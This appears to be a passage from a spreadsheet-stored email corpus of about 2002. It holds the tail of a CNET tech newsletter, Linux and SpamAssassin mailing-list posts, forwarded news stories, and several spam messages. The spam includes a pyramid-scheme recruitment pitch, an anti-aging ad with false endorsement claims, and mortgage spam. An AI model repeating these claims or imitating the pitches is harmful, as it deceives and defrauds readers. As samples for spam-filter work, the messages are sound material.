 &lt;font size="-1"&gt;Yahoo now charges for services that were once free; Hotmail
    dumps accounts without so much as an explanation. So-called
    free Web-based e-mailers aren't quite as free-wheelin' as they
    once were. Are the savings worth the hassle? We take another
    look at "free" e-mailers.
 &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkHnWRjRq0QzbMuLbLad4R" &gt;More software&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /software --&gt;
 &lt;p&gt;
 &lt;!-- hardware --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_hard.gif" alt="Hardware" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzzADdmCZhKQcaLlAI6OrR" &gt;IBM's thin ThinkPads fit to a T&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;The ThinkPad T-series notebooks are fast, and they offer a
    great design, innovative features, and good support. For a
    comprehensive look at this line of notebooks, check out our
    verdict.
 &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qBTmVwKxTiMEyR1N675iR" &gt;More notebooks&lt;/a&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKH-e3ghcpVdngyV7VDjSPR" &gt;Read the review&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
    &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAELYwllg9Z5VKc-3P0BcR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /hardware --&gt;
 &lt;p&gt;
 &lt;!-- electronics --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_ele.gif" alt="Electronics" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwfrHttIYjKHbtbXYzHRR" &gt;MP3 player personality test&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;These days, there are almost as many types of MP3 player as
    there are types of MP3 listener.  That's why it can be a
    daunting task to winnow through what's available to find your
    perfect match.  Take our MP3 player personality test to find
    out which one suits you best.
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKMYt2AI7Bc1bJBykEmZR" &gt;More portable audio&lt;/a&gt;
 &lt;br&gt;
 &lt;/font&gt;
 &lt;!-- /electronics --&gt;
 &lt;p&gt;
 &lt;!-- tech trends --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_tech.gif" alt="Tech Trends" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK1S0n0ETs6gJLkjCXMZHnR" &gt;Gifts for grads: home entertainment&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;
   Fixing up that first apartment can be a trying time for a
    young grad. Make it easy by throwing in some home-theater
    equipment along with the congratulations. Combining a DVD
    player with a solid speaker system, the Onkyo HTS-L5 is the
    perfect all-in-one-device. Also on tap: portable DVD players,
    the best TiVo player we found, and a 27-inch HD-ready TV set
    that's perfect for the smart set.
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1UnQqKRV3V0z6qjySJGeR" &gt;More in Tech Trends&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /tech trends --&gt;
 &lt;p&gt;
 &lt;!-- software --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_soft.gif" alt="Software" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKmLnyZCZdWfGJ0kSyVjyR" &gt;Peachtree Complete Accounting 2003&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;For years, Peachtree has provided professional accounting to
    small businesses. As a result, Peachtree Complete 2003 has all
    the basics, including inventory control, time billing, and
    payroll management. And Peachtree even contains a wide array
    of Web tools for creating and maintaining an online store.
    What's new in 2003?
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpWqpyl3Th3wiOPYOLipujlR" &gt;More software&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /software --&gt;
 &lt;p&gt;
 &lt;!-- wireless --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_wi.gif" alt="Wireless" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdP0pV4BsnOIRzw0LGkk4R" &gt;Siemens S46&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;The company's second mobile for the U.S. market picks up where
    the stylish S40 left off. Like that earlier model, this one's
    a world phone with business-centric features. How impressive
    is it?
 &lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDFITIs_esdo6MzbuNK5xrR" &gt;More in wireless phones&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /wireless --&gt;
 &lt;p&gt;
 &lt;br clear=left&gt;
 &lt;a name="buzz"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 &lt;tr valign=bottom&gt;&lt;td width=70 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/BUZZMETER.gif" width=90 height=15 alt="Buzz Meter"&gt;&lt;/td&gt;
 &lt;td width=339&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt;&amp;nbsp;WorldCom woes continue&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=14&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=2 bgcolor="#CC9999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;font face="arial, helvetica" size="-1"&gt;
 WorldCom woes dominate, BearShare 4.0 isn't what it used to be,
 and Jaguar runs ahead of schedule.&lt;/font&gt;
 &lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;i&gt;--Laura Lindhe, executive editor, CNET Tech Trends&lt;/i&gt;&lt;/font&gt;
 &lt;p&gt; 
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;1&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QkpoX8LHlbgi4cHr7W6TiR" &gt;WorldCom&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
 I hate to put it first, but unfortunately, all other
    tech trends are overshadowed by this scandal. Now entering its
    fourth week as front-page news, WorldCom woes continue to sap
    investor confidence. This week's big story: the top execs from
    the company are standing silent against government accusations
    of wrongdoing.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;2&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFVqFy6WmDblRuaBDxRU4R" &gt;BearShare 4.0&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
 This new version of the well-known peer-to-peer
    software was been completely redesigned and comes in two
    flavors: free with ads and paid without ads. This is nice
    touch, but unfortunately, 4.0 fails in one key area:
    downloading music. It uses the Gnutella client, but in CNET's
    tests, it had an abysmal success rate at actually returning
    files.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;3&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsBDvgIJgwzk0xBfd-8WrR" &gt;Jaguar&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
   Who ever heard of an operating system release being
    early? Well, Apple is managing to pull off the impossible; it
    intends to ship an update to OS X in August, instead of the
    anticipated late fall time frame.   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;4&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzxPmareVXCHnpqL0wRR" &gt;Warcraft III&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
 Ah, summer: the perfect time to stay inside and
    sit in front of your computer. Warcraft III has just been
    released--right in time for the good weather. GameSpot calls
    it one the finest games ever made, but if that doesn't do it
    for you, there's another fighting game on deck (see No. 5).
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;5&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9SUaBu3rctPQDwwaMC9R" &gt;America's Army&lt;/a&gt;:&lt;/b&gt;&lt;br&gt; As Senior Editor Darren Gladstone pointed out in a recent column, the Army wants &lt;i&gt;you&lt;/i&gt; to play PC games.
    That's right: the United States Army spent $6.3 million
    developing its own title, and it has just launched a television
    campaign to drum up interest. Apparently, the campaign is
    working, since CNET users made America's Army a top search
    term last week.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td colspan="2" align="left"&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 For more Buzz, &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwpd9O5380ywQ-4d0P6cR" &gt;click here&lt;/a&gt;.
 &lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%25"&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;UL&gt;
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kir82T6EoaDkjVsTLZ8iR" &gt;Live tech help: submit your question now&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorV4trBr1yZeU_u_KnPR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2Mwy_1iWLXZBXqONOVnR" &gt;Find a job you love with more than 1 million postings&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdpWabR5w8PF_jEuwteR" &gt;Editors' Choice Award: Pioneer's HTS-910DV&lt;/A&gt; 
 &lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;/td&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=d4-E0mqr6EdePDN0aCvaMdT2nvAyVEP69RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOsN0LL0TRnU3P83P5XlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4eiFO6wiZxrhBm0WHtheR"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href="http://clickthru.online.com/Click?q=14-5MRAIF-zaHzjyFu8ZvQIzTKtR1yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHExneOuNyGEI9rCM8vlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXe2aSxOO_7DQESNPe-i4R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6pnE0c-RjHpx8lOheMncR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhLymI-AywvjsK-FdLPRR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPdjEyN5FUywq2NRJSBTZR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e404-02&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=93-V4Zm-JdN3VHS0HOCFJ2tr1cmKdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Six arrested for attacking Palio jockey who defected
</t>
  </si>
  <si>
    <t xml:space="preserve">The Electronic Telegraph
  Six arrested for attacking Palio jockey who defected 
  By Bruce Johnston in Rome
  (Filed: 28/08/2002) 
  Police waded into the intrigues and enmities surrounding the Palio, Siena's
  traditional bareback horse race, for the first time yesterday, arresting six
  people for beating up a star jockey who defected to a rival team.
  Angry spectators attack Giuseppe Pes at the Palio horse race in Siena 
  Giuseppe Pes, a champion jockey of Sardinian extraction who has won the Palio
  nine times in 38 runs, was closely associated with the Istrice, or Porcupine,
  contrada - section of town - until the race earlier this month.
  Istrice did not have a horse in the contest - only 10 of the 17 contradas take
  part in each Palio - but, despite promises to the contrary, moments before the
  off Mr Pes mounted the horse of Lupa, or She-Wolf.
  Lupa are Istrice's historic rivals, and the defection was not taken well. Lupa
  did not win, victory going instead to Tartuca, tortoise.
  As its supporters erupted into joyous celebrations, Mr Pes was pulled from his
  mount by Istrice members and savagely beaten and kicked for seven minutes.
  Mr Pes, 39, whose jacket with his contrada's colours was torn from his back,
  was sent to hospital with fractures, cuts and bruises.
  Three of his attendants who tried to intervene were also beaten. Police
  yesterday arrested six people they said had been identified as the attackers
  from video footage.
  Experts said it was the first time that members of a contrada - known as
  contradaioli - had been arrested for beating up a jockey, despite the fact
  that such episodes belong to the race's ancient traditions.
  The Palio, which was first raced in the 14th century, is held twice a year on
  the cobbles of Siena's main square. For weeks beforehand supporters parade
  through the city, singing, waving flags and wearing their contrada colours.
  But by the day of the race the good humour evaporates.
  The event has no rules and is prepared for and run amid an extraordinary
  undercurrent of intrigue and even violence. Jockeys may swap sides at the last
  minute, take bribes, and whip rivals' horses, and more, so long as they do not
  grab their reins.
  The origins of the contrada lie in the Middle Ages, when the neighbourhoods'
  boundaries were set out to aid the many mercenary companies hired to defend
  Siena's fiercely earned independence from Florence and other city states.
  The first Palio of the year takes place on July 2, to commemorate the miracles
  of the Madonna of Provenzano, and a second race on Aug 16 marks the feast of
  the Assumption of the Virgin.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Everybody Gets Paid - No Recruiting Needed
</t>
  </si>
  <si>
    <t xml:space="preserve">Everybody gets paid.  No recruiting required.
 Join and reserve a position for free now.
 Program is 18 weeks old and it's paying.
 Everybody gets in line to get paid by all
 the new people coming in (but it's NOT a
 traditional straightline)...EVERYONE makes money...
 and those that sponsor make more....
 &lt;html&gt;
 &lt;a href="mailto:gmt101info@profitresponder.com?subject=send-more-info"&lt;b&gt;
 Click here to request for more information&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="mailto:stockbuyer@netzero.net?subject=REMOVE"&lt;b&gt;
 We belong to the same opt-in list. But if wish to have your email
 address REMOVE from our database please click here&lt;/b&gt;&lt;/a&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I just successfully did a cvs update via ssh.
 My CVS root looks a little different than yours.
 cat CVS/Root 
 :ext:haldevore@cvs.exmh.sourceforge.net:/cvsroot/exmh
 --Hal
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] cups question
</t>
  </si>
  <si>
    <t xml:space="preserve"> I seem to be having a little trouble with it. My printers.conf is:
 &lt;DefaultPrinter lp&gt;
 Info Hp4050
 Location locals
 DeviceURI ipp://192.168.2.90:9100/
 State Idle
 Accepting Yes
 JobSheets none none
 QuotaPeriod 0
 PageLimit 0
 KLimit 0
 &lt;/Printer&gt;
  and cupds uses that to make a printcap of:
 lp:
  Sounds dodgy to me. If someone has an example printers.conf/printcap for
 a JetDirect printer, I'd appreciate it if they sent it on.
 John
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Lacking a DOS boot disk, I just looked for a different way to do it
 yesterday.  You can use
     lilo -u /dev/hda
 Sourced via google search "remove lilo" which returned
 http://support.microsoft.com/default.aspx?scid=KB;EN-US;q315224&amp;
 Much handier if you only have tomsrtbt or something similar.
 jr
 ----- Original Message -----
 From: "jac1" &lt;jac1@student.cs.ucc.ie&gt;
 To: &lt;ilug@linux.ie&gt;
 Sent: Wednesday, July 31, 2002 2:30 PM
 Subject: [ILUG] removing lilo
 &gt; hi,
 &gt; i recently had to wipe linux from my pc but forgot to restore the original
 &gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no
 boot
 &gt; floppy. formatting the entire disk doesn't do it either.
 &gt;
 &gt;
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Avast there matey
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Kragen Sitaker" &lt;kragen@pobox.com&gt;
 &gt; &gt; It's an exclamation that may allude to a ship striking some rock or
 &gt; &gt; other obstacle so hard that her timbers shiver, or shake, so implying a
 &gt; &gt; calamity has occurred. It is first recorded as being used by Captain
 &gt; &gt; Frederick Marryat in /Jacob Faithful/ in 1835: "I won't thrash you Tom.
 &gt; &gt; Shiver my timbers if I do".
 I think it went like this: "I won't thrash you Tom, if you shiver my
 timber..."
 Or maybe that was just the butt pirates...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] All but one testing
</t>
  </si>
  <si>
    <t xml:space="preserve">David LeBlanc wrote:
 &gt; Errr... not to be pedantic or anything, but this is called "omit one
 &gt; testing" or OOT in the literature IIRC.
 I have no idea.  I made up the name.  Thanks for the correction.
   Neil
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DO YOU WANT TO: Lose Fat, Gain Muscle, Increase Energy Level?30028
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health discovery that actuallyreverses aging while burning fat, without dieting or exercise! This provendiscovery has even been reported on by the New England Journal of Medicine.Forget aging and dieting forever! And it's Guaranteed! 
 Click below to enter our web site:
 http://www.freehostchina.com/washgh/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Click below to enter our web site:
 http://www.freehostchina.com/washgh/
 **************************************************
 If you want to get removed
 from our list please email at- standardoptout@x263.net (subject=remove "your email")
 **************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Uncle Mark seeks parole
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/entertainment/showbiz/2308581.stm
 Tuesday, 8 October, 2002, 07:55 GMT 08:55 UK
 Lennon killer seeks parole again
 The man who shot dead former Beatle John Lennon is making another bid for
 early release from prison - the day before what would have been Lennon's
 62nd birthday.
 Mark David Chapman, 47, was jailed for life after he admitted killing the
 superstar outside his New York apartment building in 1980.
 It is the second time in two years that Chapman has sought parole from
 Attica state prison.
 At a 2000 hearing, he argued that he was no longer a danger to society and
 had overcome the psychological problems which led him to shoot the
 ex-Beatle.
 Chapman had said that a voice in his head told him to shoot the star.
 Shot dead
 Lennon was shot four times as he emerged from a limousine outside his New
 York City apartment on 8 December 1980.
 He and his wife Yoko Ono were returning from a late-night recording session
 during which time they had been working on Walking on Thin Ice.
 Only hours before the shooting, Chapman - who had come to New York from
 Hawaii - was photographed with the singer outside the same building as
 Lennon signed a copy of his album Double Fantasy for him.
 The killer said Lennon had been just "a picture on an album cover" to him
 before the shooting.
 'Deserved death'
 Chapman has said that he should have received the death penalty for his
 crime.
 Lennon's widow told the 2000 parole hearing that she would not feel safe if
 Chapman were released.
 Lennon's songwriting partnership with Paul McCartney propelled the
 Liverpool-based pop group to international stardom and unparalleled
 commercial success.
 The Beatles front man, peace campaigner, and all-round iconoclast, would
 have been 62 on Wednesday.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Running SA as a user app?
</t>
  </si>
  <si>
    <t xml:space="preserve">Can anybody point me to a project/FAQ similar to this:?
 1. Perl script fetches POP mail from a distant server
 2. mail is fed to SA, running as a standalone module in my user account
 3. SA spits out results back to perl script.
 4. Script deletes offending mail.
 I don't have root access.  I don't need a MTA.
 =0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0
 Chris Fortune
 Fortune's Web Computer Services
 Nelson, BC, Canada
 V1L 2W3
 ph#: 250 505-5012
 email: cfortune@telus.net
 website: http://cfortune.kics.bc.ca/
 =0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0
 -------------------------------------------------------
 Sponsored by: AMD - Your access to the experts on Hammer Technology! 
 Open Source &amp; Linux Developers, register now for the AMD Developer 
 Symposium. Code: EX8664 http://www.developwithamd.com/developerlab
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: And Away We go
</t>
  </si>
  <si>
    <t xml:space="preserve">Nope, a true geek would have a Blackberry so he could give us updates *from* the hospital.
 Ken
 &gt; -----Original Message-----
 &gt; From: CDale [mailto:cdale@techmonkeys.net]
 &gt; Sent: Saturday, July 27, 2002 6:22 AM
 &gt; 
 &gt; A true geek.  Runs to the puter to post before taking a 
 &gt; laboring wife to 
 &gt; the hospital.  I'd kill you.  LOL
 &gt; Grats, Daddy-o!
 &gt; C
 &gt; 
 &gt; On Sat, 27 Jul 2002, Tom wrote:
 &gt; 
 &gt; &gt; 
 &gt; &gt; Off we go to the hospital
 &gt; &gt; 
 &gt; &gt; Benjamin Wallace Higgins is on his way.
 &gt; &gt; 
 &gt; &gt; -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Ryder Cup
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8355996,215/
 Date: 2002-09-28T23:38:59+01:00
 *Dan Rookwood* and *Lawrence Booth* on how Europe and the United States ended 
 all-square to set up a tense final day.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Teens videotape themselves shooting stapleguns into their arms
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8269406,1717/
 Date: 2002-09-26T09:23:44+01:00
 [IMG: http://www.newsisfree.com/Images/fark/bostonglobe.gif ([BostonGlobe])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@rpmforge.net) wrote*:
 &gt;- I've rebuilt a new "alsaplayer" package based on Angle's one.
 Cool, one less package to maintain :)
 One interesting thing about alsaplayer is that RedHat's XMMS package in RH8 will
 probably not play mp3 files. But alsaplayer does play mp3s "out of the box".
 Also, they are developing rapidly in their CVS and looks like their next version
 of alsaplaer will be pretty cool, but I have no idea when it will be ready.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save $30k even if you've refi'd                 3821
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face=3D"Arial" color=3D"#FF0000"&gt;&lt;b&gt;Attention U.S. HomeOwners&lt;/b&gt;=
 &lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;If you want to save an extra $30,000 (average s=
 avings)&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;on your mortgage even if you have already refin=
 anced&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.myratedoctor.com"&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;CLICK H=
 ERE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;We also have the lowest rates and most professi=
